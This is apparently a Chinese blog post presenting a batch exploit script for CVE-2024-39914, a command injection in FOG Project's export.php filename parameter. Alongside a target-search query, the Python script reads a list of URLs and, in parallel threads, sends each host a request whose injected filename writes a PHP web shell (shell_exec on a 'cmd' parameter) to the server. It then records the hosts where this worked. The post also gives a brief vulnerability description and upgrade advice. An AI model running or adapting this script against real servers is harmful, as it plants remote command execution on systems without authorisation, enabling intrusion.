FOG Project 文件名命令注入漏洞批量POC脚本(CVE-2024-39914)

漏洞描述

FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名filename参数中。

漏洞影响

FOGPROJECT < 1.5.10.34 版本

搜索语句

鹰图平台:web.body="FOG Project" 

批量脚本

import requests
import threading


class fog_poc:
    def __init__(self, file_path):
        file_path = file_path.replace('\"', '')
        file_path = file_path.replace('\'', '')
        with open(file_path, 'r') as f:
            self.url_list = f.readlines()

    def poc(self):
        #构造poc
        url_path = '/fog/management/export.php?filename=$(echo+\'<?php+echo+shell_exec($_GET["cmd"]);+?>\'+>+Ma1g3.php)&type=pdf'
        header = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
        data = 'fogguiuser=fog&nojson=2'
        threads = []

        def test_url(url):
            url = url.replace('\n', '')
            header['Host'] = url.split('//')[1]
            url1 = url + url_path
            try:
                requests.packages.urllib3.disable_warnings()
                response = requests.post(url1, data=data, headers=header, verify=False)
                if 'Content-Disposition' in response.headers:
                    print(url + '存在此漏洞!!!')
                    with open('漏洞url.txt', 'a') as f:
                        f.write('\n' + url)
                else:
                    print(url + '没有此漏洞')
            except Exception as e:
                print(e)

        for url in self.url_list:
            thread = threading.Thread(target=test_url, args=(url,))
            threads.append(thread)
            thread.start()

        for thread in threads:
            thread.join()


if __name__ == '__main__':
    file_path = input('请输入url文件路径:')
    test = fog_poc(file_path)
    test.poc()

示例

漏洞利用

修复建议

升级至安全版本

参考

https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j

  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值